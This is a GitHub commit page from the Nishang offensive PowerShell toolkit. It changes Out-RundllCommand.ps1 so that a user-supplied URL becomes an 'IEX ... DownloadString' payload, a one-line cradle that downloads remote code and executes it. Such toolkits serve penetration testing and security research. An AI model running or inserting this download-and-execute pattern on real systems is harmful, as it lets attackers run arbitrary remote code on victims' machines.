Skip to content

Commit

Permalink
Out-RundllCommand can execute custom paylods now
Browse files Browse the repository at this point in the history
  • Loading branch information
samratashok committed Jan 17, 2017
1 parent 1f14fda commit 9ac8207
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions Execution/Out-RundllCommand.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -83,8 +83,8 @@ https://github.com/samratashok/nishang

else
{
#Check if the payload has been provided by the user
if(!$Payload)
#Check if the payload url has been provided by the user
if($PayloadURL)
{
$Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
}
Expand Down

0 comments on commit 9ac8207

Please sign in to comment.